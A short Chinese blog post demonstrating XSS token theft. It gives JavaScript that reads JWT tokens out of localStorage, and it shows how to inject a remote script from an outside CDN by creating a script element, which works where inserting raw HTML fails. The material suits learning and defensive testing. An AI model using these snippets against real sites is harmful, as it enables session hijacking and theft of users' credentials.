Web 安全问题验证：如何使用 XSS 窃取 token All In One

Web 安全问题验证：如何使用 XSS 窃取 token All In One

XSS 读取 localStorage 存储的 JWT token

// js 遍历 localStorage
for (let i = 0; i < localStorage.length; i++) {
  const key = localStorage.key(i);
  const value = localStorage.getItem(key);
  console.log(`key, value =`, key, value);
}

js 遍历 localStorage

// key 是关键字 💩
localStorage.setItem(`key`, 'value');
localStorage.setItem(`abc`, 'xyz');
localStorage;

// Storage {abc: 'xyz', length: 2}
for (let item of localStorage) {
    console.log(`localStorage item =`, item);
}
// Uncaught TypeError: localStorage is not iterable ❌

localStorage.length;
// 2

localStorage;
// Storage {abc: 'xyz', length: 2}abc: "xyz"key: <value unavailable>length: 2[[Prototype]]: Storage

localStorage.getItem(`abc`)
// 'xyz'
localStorage.getItem(`key`)
// 'value'


for (let i = 0; i < localStorage.length; i++) {
  const key = localStorage.key(i);
  console.log(`key, value =`, key, localStorage.getItem(key));
}

demos

如何执行页面中插入的第三方 js 连接

https://cdn.xgqfrms.xyz/web-security/xss-jwt-token.js

1. 直接插入 script 链接 ❌

// ❌ js 不会执行
document.body.insertAdjacentHTML(`beforeend`, `<script src="https://cdn.xgqfrms.xyz/web-security/xss-jwt-token.js" async></script>`);

// ❌  js 不会执行
document.body.insertAdjacentHTML(`beforeend`, `<script src="https://cdn.xgqfrms.xyz/js-hacks/drc-drm.js" async></script>`);

2. 动态创建 script 然后插入到 DOM 中 ✅

const script = document.createElement(`script`);
script.id = `xss`;
document.body.appendChild(script);
// ✅  js 会执行
script.src = `https://cdn.xgqfrms.xyz/web-security/xss-jwt-token.js`;

const script = document.createElement(`script`);
script.id = `xss`;
script.src = `https://cdn.xgqfrms.xyz/web-security/xss-jwt-token.js`;
// ✅  js 会执行
document.body.appendChild(script);

(🐞 反爬虫测试！打击盗版⚠️）如果你看到这个信息, 说明这是一篇剽窃的文章，请访问 https://www.cnblogs.com/xgqfrms/ 查看原创文章！

refs

https://developer.mozilla.org/en-US/docs/Web/API/Window/localStorage

---

---

©xgqfrms 2012-2021

www.cnblogs.com/xgqfrms 发布文章使用：只允许注册用户才可以访问！

原创文章，版权所有©️xgqfrms, 禁止转载 🈲️，侵权必究⚠️！

---